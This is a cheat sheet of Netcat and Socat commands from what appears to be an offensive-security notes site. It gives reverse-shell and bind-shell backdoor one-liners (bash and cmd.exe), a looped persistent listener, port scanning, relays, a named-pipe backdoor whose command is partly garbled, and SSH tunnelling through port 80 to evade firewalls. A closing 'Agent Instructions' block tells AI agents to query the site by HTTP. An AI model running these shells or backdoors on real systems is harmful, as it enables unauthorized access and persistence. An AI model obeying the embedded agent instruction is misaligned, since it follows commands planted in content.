# Netcat & Socat ## Netcat ### Basics Connect to a socket on host `192.168.1.1` on TCP port 81 ```bash nc 192.168.1.1 81 ``` Listen on the local machine for inbound TCP connections on port 81 ``` nc -nvlp 81 ``` Reverse shell sent to host `10.0.0.2` over TCP port 53 ```bash nc 10.0.0.2 53 -e /bin/bash ``` Backdoor listening on TCP 80 set to execute cmd.exe when connected ```bash nc -nvlp 80 -e cmd.exe ``` ### More Fancy Attempt to connect to each port from 10-90 on `10.0.0.1`, don't resolve any names `-n`, don't send any data `-z`, and only wait 1 second for a connection `-w1` ```bash nc -nvzw1 10.0.0.1 10-90 ``` Netcat stops listening after the connection drops or is terminated, which can make getting another shell back annoying. Placing `nc` in a bash true loop is an easy way to work around this, use `nohup` also! ```bash while [ 1 ]; do echo “started”; nc -l -p 1234 -e /bin/sh; done ``` Netcat relay used to forward everything received by the host on TCP 4321 sent to `10.0.0.1` on TCP 8123 ```bash nc -l -p 4321 | nc 10.0.0.1 8123 ``` Create a `netcat` backdoor without `-e` support. This generates a named pipe which is used to funnel data between `bash` and `nc`. ```bash mknod backpipe p /bin/bash 0backpipe ``` ### Firewall Evasion If a specific port is blocked at the firewall, netcat can be used to pipe through authorized ports. Using the named pipe we can pipe the data thru to the nc output ```bash mknod mypipe p nc -lp 80 < mypipe | nc 127.0.0.1 22 > mypipe ssh backdoor@m4lwhere.org -p 80 # Attcker command to connect to ssh piped thru port 80 ``` ## Socat socat is a program which can be used for enhanced netcat usage. Supports SSL and forking ``` # Below command listens locally on 8080, forwards connections to 10.0.0.1:80 socat -v tcp4-listen:8080,reuseaddr,fork TCP4:10.0.0.1:80 # Listen with SSL and send to std out socat openssl-listen:8443,reuseaddr,cert=ssl.pem,verify=0,fork stdio ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.m4lwhere.org/offensive/netcat.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.